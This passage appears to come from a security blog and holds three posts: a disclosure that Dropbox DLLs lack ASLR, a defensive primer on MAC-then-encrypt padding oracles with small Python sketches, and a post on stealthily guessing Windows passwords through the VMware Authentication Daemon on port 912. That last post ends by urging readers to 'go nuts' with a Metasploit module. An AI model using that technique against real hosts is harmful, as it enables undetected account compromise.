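Running this over the injected Dropbox DLLs reproduces the result in the screenshots: no DYNAMIC_BASE bit, no randomised base address.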

I notified Dropbox of this back when a previous version was the latest, but got no response. I’ve since tried again, but had no luck. I’m hoping that going public will give them the kick they need to get it fixed. In the meantime, a good mitigation is to install EMET and set a policy to enforce Mandatory ASLR. All of this was re-tested against Dropbox 2.0.22, with the current versions of both the 32-bit and 64-bit DLLs. The operating system used was Windows 7 x64 SP1.

Update: Brad “spender” Spengler (of grsec fame) has noted that the latest version of Dropbox has ASLR enabled for the 64-bit DLL, but still not for the 32-bit one.

Update 2: Dropbox responds: “Our engineers are aware of this issue and actively working on fixing it. Unfortunately, I can’t give you an exact timeline that a fix will become available. If you have any additional questions or concerns please let me know.”

Update 3: @_sinn3r has done some awesome work on the exploitability of these issues, over at Metasploit. Definitely worth a read.

A quick crypto lesson – why “MAC then encrypt” is a bad choice

In light of the numerous recent attacks against SSL, I thought I’d offer up a quick and simple crypto lesson about why MAC-then-encrypt schemes are bad. This post will require only a minimum of knowledge about cryptography, so hopefully it’ll be useful to a wide range of people.

This is not designed to be a full and detailed description of how SSL works, or how various attacks against it work, but rather a short primer on the subject for those who know a bit about crypto but don’t really understand how something as seemingly strong as SSL might be broken. Some parts have been generalised or simplified for brevity and ease of understanding, so please don’t take anything I say here as a literal description of how it all works.

Anyway, let’s get started…

A secure network protocol has two main jobs:

  1. Keep the information in the conversation completely confidential.
  2. Prevent an attacker from tampering with the conversation.

The first part, as you probably already know, is performed by encryption. This usually involves exchanging one or more secret session keys between two endpoints, then using them with a cipher of some kind in order to provide safety against eavesdroppers.

The second part is a little more involved. In this case, when I say “tampering with the conversation”, I mean forging packets that look like they came from a legitimate endpoint, in such a way that they have a meaningful effect on the security of the conversation. This part is often implemented via a Message Authentication Code (MAC), which verifies that all data received was in fact sent by an authorised endpoint. Usually an HMAC is used, which is a keyed version of a cryptographic hash function. By using the session key as the HMAC key, it is possible to produce a tag over the payload that cannot be forged by anyone who does not know the session key. By computing the same HMAC on the receiving end, using the same session key, it is possible to verify the authenticity of the data.
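As a minimal sketch of that scheme (the key here is a placeholder; in a real protocol it would come from the session key exchange):

```python
import hashlib
import hmac

# Placeholder: in a real protocol this is derived during the handshake.
SESSION_KEY = b"negotiated-session-key"

def tag(message: bytes) -> bytes:
    # Only someone holding SESSION_KEY can compute this tag.
    return hmac.new(SESSION_KEY, message, hashlib.sha256).digest()

def verify(message: bytes, received_tag: bytes) -> bool:
    # Recompute the tag and compare in constant time to avoid timing leaks.
    return hmac.compare_digest(tag(message), received_tag)
```

Flipping even a single bit of the message (or of the tag) makes verification fail, which is exactly the property the protocol relies on.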

However, there’s a catch. One implementation option, called MAC-then-encrypt, is to compute the MAC over the plaintext, then encrypt the message. The receiving endpoint decrypts the data using the session key, then verifies its authenticity. Unfortunately, this means that an unauthenticated attacker can send arbitrary messages, which the receiving endpoint must decrypt before it can verify the MAC. Without knowing the session key, the attacker will likely produce garbage data after decryption, and the MAC will not match.

There is, however, an interesting trick that can be done here. Block ciphers require the length of every plaintext message to be a multiple of the cipher’s block size. Since messages rarely fit exactly, padding is appended to extend them to the required length. There are many different padding schemes, but the padding bytes are usually derived from the amount of padding required (as in PKCS#7). This padding is checked during the decryption phase, and invalid padding results in an error. An attacker can flip certain bits in the ciphertext to corrupt this padding, and observe differences in error behaviour and timing caused by the altered bits. This is called a padding oracle attack, and can lead to full recovery of the plaintext.
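To make the oracle concrete, here is a sketch of a PKCS#7-style padding check. In a MAC-then-encrypt protocol, this check runs on attacker-influenced decrypted bytes, and the difference between its failure and a MAC failure (in error message or in timing) is exactly what the attacker measures:

```python
def check_pkcs7(plaintext: bytes, block_size: int = 16) -> bytes:
    """Strip PKCS#7 padding, raising on anything malformed.

    In PKCS#7, a message needing n bytes of padding is extended with n
    copies of the byte value n. The error raised here is distinguishable
    from a MAC failure, which is what makes it an oracle.
    """
    if not plaintext or len(plaintext) % block_size:
        raise ValueError("bad length")
    n = plaintext[-1]
    if not 1 <= n <= block_size or plaintext[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return plaintext[:-n]
```

By repeatedly submitting doctored ciphertexts and watching which of the two failures occurs, the attacker can recover the plaintext one byte at a time.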

A better solution, called encrypt-then-MAC, is to encrypt the data first, then compute the MAC of the ciphertext. This leads to a situation where the receiving endpoint checks the MAC first, before performing decryption, and drops the connection if the MAC is incorrect. Since the attacker can’t forge the MAC without knowing the session key, this completely negates the padding oracle attack.
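A minimal encrypt-then-MAC sketch might look like the following. The “cipher” here is a deliberately toy XOR keystream standing in for a real block cipher (do not use it for anything); the important part is the order of operations in open_sealed: the MAC is checked over the ciphertext, in constant time, before any decryption or padding logic runs:

```python
import hashlib
import hmac
import secrets

# Independent keys for encryption and authentication (good practice).
MAC_KEY = secrets.token_bytes(32)
ENC_KEY = secrets.token_bytes(32)

def _keystream_xor(data: bytes) -> bytes:
    # Toy stand-in for a real cipher, NOT secure: XOR against a fixed
    # keystream derived from ENC_KEY. A real protocol would use e.g. AES.
    stream = hashlib.sha256(ENC_KEY).digest()
    ks = (stream * (len(data) // len(stream) + 1))[:len(data)]
    return bytes(a ^ b for a, b in zip(data, ks))

def seal(plaintext: bytes) -> bytes:
    """Encrypt-then-MAC: the tag covers the ciphertext, not the plaintext."""
    ct = _keystream_xor(plaintext)
    return ct + hmac.new(MAC_KEY, ct, hashlib.sha256).digest()

def open_sealed(blob: bytes) -> bytes:
    """Verify the MAC *before* any decryption or padding checks."""
    ct, received = blob[:-32], blob[-32:]
    expected = hmac.new(MAC_KEY, ct, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, received):
        # Every forgery dies here, so no padding oracle is ever reachable.
        raise ValueError("bad MAC")
    return _keystream_xor(ct)
```

Because any bit-flip in the ciphertext is rejected at the MAC check, the attacker never gets to exercise the padding logic at all.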

How is all of this relevant to SSL? Well, the CBC cipher suites in TLS (up to and including TLS 1.2) use a MAC-then-encrypt scheme. This contributed to various attacks against CBC mode, including BEAST (a predictable-IV issue in TLS 1.0) and Lucky 13 (a padding oracle timing attack). These are mitigated by the encrypt-then-MAC extension (RFC 7366) and by preferring AEAD cipher suites, which avoid MAC-then-encrypt entirely.

Hopefully this has given you some insight into one of the ways that SSL can be vulnerable.

Password cracking with VMware Authentication Daemon

I just came across a cool trick which allows you to crack passwords on a remote system that is running the VMware Authentication Daemon. This service is installed and runs by default on Windows hosts with VMware Workstation installed, and listens on TCP port 912. It shows up in nmap as apex-mesh, but doesn’t follow the APEX protocol at all. Instead, it looks like a hybrid between an FTP and an SMTP server:

220 VMware Authentication Daemon Version 1.0, ServerDaemonProtocol:SOAP, MKSDisplayProtocol:VNC ,
530 Please login with USER and PASS.
USER test
331 Password required for test.
PASS test
530 Login incorrect.
USER Graham
331 Password required for Graham.
PASS <snip>
230 User Graham logged in.
500 Unknown command '?'
500 Unknown command 'HELP'
500 Unknown command 'INFO'
500 Unknown command 'STAT'
CD C:\
500 Unknown command 'CD C:\'
500 Unknown command 'HELO'
500 Unknown command 'HELLO'
500 Unknown command 'EXIT'
221 Goodbye

As you can see, I couldn’t find any working commands. The interesting part is that it accepted my real NT username and password for the machine that the service was running on. Even more interesting, it doesn’t seem to have any rate-limiting or obvious “failed attempt” logs, so it’s much more stealthy than attacking RDP or SMB directly. In fact, this may translate over to Linux user accounts, too.

It turns out that someone has already created a Metasploit module for exactly this purpose, so go nuts!